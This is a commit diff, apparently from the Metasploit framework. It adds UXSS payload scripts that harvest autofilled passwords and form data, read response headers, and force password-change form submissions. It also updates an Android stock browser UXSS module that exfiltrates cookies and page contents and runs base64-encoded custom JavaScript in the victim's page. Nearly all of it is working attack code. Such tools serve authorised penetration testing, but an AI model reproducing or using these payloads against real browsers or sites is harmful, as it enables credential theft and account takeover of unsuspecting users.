Add some common UXSS scripts.

data/exploits/uxss/steal_form.js

@@ -0,0 +1,33 @@
+/* steal_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal any autofilled inputs, saved passwords, or any */
+/* data entered into a form.                                       */
+
+/* keep track of what input fields we have discovered */
+var found = {};
+setInterval(function(){
+  /* poll the DOM to check for any new input fields */
+  var inputs = document.querySelectorAll('input,textarea,select');
+  Array.prototype.forEach.call(inputs, function(input) {
+    var val  = input.value||'';
+    var name = input.getAttribute('name')||'';
+    var t    = input.getAttribute('type')||'';
+    if (input.tagName == 'SELECT') {
+      try { val = input.querySelector('option:checked').value }
+      catch (e) {}
+    }
+    if (input.tagName == 'INPUT' && t.toLowerCase()=='hidden') return;
+
+    /* check if this is a valid input/value pair */
+    try {
+      if (val.length && name.length) {
+        if (found[name] != val) {
+
+          /* new input/value discovered, remember it and send it up */
+          found[name] = val;
+          var result = { name: name, value: val, url: window.location.href, send: true };
+          (opener||top).postMessage(JSON.stringify(result), '*');
+        }
+      }
+    } catch (e) {}
+  });
+}, 200);

data/exploits/uxss/steal_headers.js

@@ -0,0 +1,17 @@
+/* steal_headers.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal the response headers of the loaded URL.           */
+
+/* send an XHR request to our current page */
+var x = new XMLHttpRequest;
+x.open('GET', window.location.href, true);
+x.onreadystatechange = function() {
+  /* when the XHR request is complete, grab the headers and send them back */
+  if (x.readyState == 2) {
+    (opener||top).postMessage(JSON.stringify({
+      headers: x.getAllResponseHeaders(),
+      url: window.location.href,
+      send: true
+    }), '*');
+  }
+};
+x.send();

data/exploits/uxss/submit_form.js

@@ -0,0 +1,36 @@
+/* submit_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to modify and submit a form in the target page.          */
+
+/* modify this hash to your liking */
+var formInfo = {
+
+  /* CSS selector for the form you want to submit */
+  selector: 'form[action="/update_password"]',
+
+  /* inject values into some input fields */
+  inputs: {
+    'user[new_password]': 'pass1234',
+    'user[new_password_confirm]': 'pass1234'
+  }
+}
+
+var c = setInterval(function(){
+  /* find the form... */
+  var form = document.querySelector(formInfo.selector);
+  if (!form) return;
+
+  /* loop over every input field, set the value as specified. */
+  Array.prototype.forEach.call(form.elements, function(input) {
+    var inject = formInfo.inputs[input.name];
+    if (inject) input.setAttribute('value', inject);
+  });
+
+  /* submit the form and clean up */
+  form.submit();
+  clearInterval(c);
+
+  /* report back */
+  var message = "Form submitted to "+form.getAttribute('action');
+  var url = window.location.href;
+  (opener||top).postMessage(JSON.stringify({message: message, url: url}), '*');
+}, 100);

modules/auxiliary/gather/android_stock_browser_uxss.rb

@@ -53,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
         false,
         "Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
         false
+      ]),
+      OptBool.new('CLOSE_POPUP', [
+        false,
+        "When BYPASS_XFO is enabled, this closes the popup window after exfiltration.",
+        true
       ])
     ], self.class)
   end
@@ -76,8 +81,11 @@ class Metasploit3 < Msf::Auxiliary
         var received = [];
 
         window.addEventListener('message', function(e) {
-          if (bypassXFO && received[JSON.parse(e.data).i]) return;
+          var data = JSON.parse(e.data);
-          if (bypassXFO && e.data) received.push(true);
+          if (!data.send) {
+            if (bypassXFO && data.i && received[data.i]) return;
+            if (bypassXFO && e.data) received.push(true);
+          }
           var x = new XMLHttpRequest;
           x.open('POST', window.location, true);
           x.send(e.data);
@@ -105,12 +113,14 @@ class Metasploit3 < Msf::Auxiliary
 
         function attack(target, n, i, cachedN) {
           var exploit = function(){
-            window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage(JSON.stringify({cookie:document'+
+            window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
-              '.cookie,url:location.href,body:document.body.innerHTML,i:'+(i||0)+'}),"*");'+
+              'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
-              '#{datastore['CUSTOM_JS']||''};}void(0);', n);
+              'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(datastore['CUSTOM_JS'])}"'+
+              '));}void(0);', n);
           }
           if (!n) {
             n = cachedN || randomString();
+            var closePopup = #{datastore['CLOSE_POPUP']};
             var w = window.open(target, n);
             var deadman = setTimeout(function(){
               clearInterval(clear);
@@ -119,15 +129,19 @@ class Metasploit3 < Msf::Auxiliary
             }, 10000);
             var clear = setInterval(function(){
               if (received[i]) {
-                try{ w.stop(); }catch(e){}
+                if (i < targets.length-1) {
-                try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
+                  try{ w.stop(); }catch(e){}
+                  try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
+                }
+
                 clearInterval(clear);
                 clearInterval(clear2);
                 clearTimeout(deadman);
+
                 if (i < targets.length-1) {
                   setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);
                 } else {
-                  w.close();
+                  if (closePopup) w.close();
                 }
               }
             }, 50);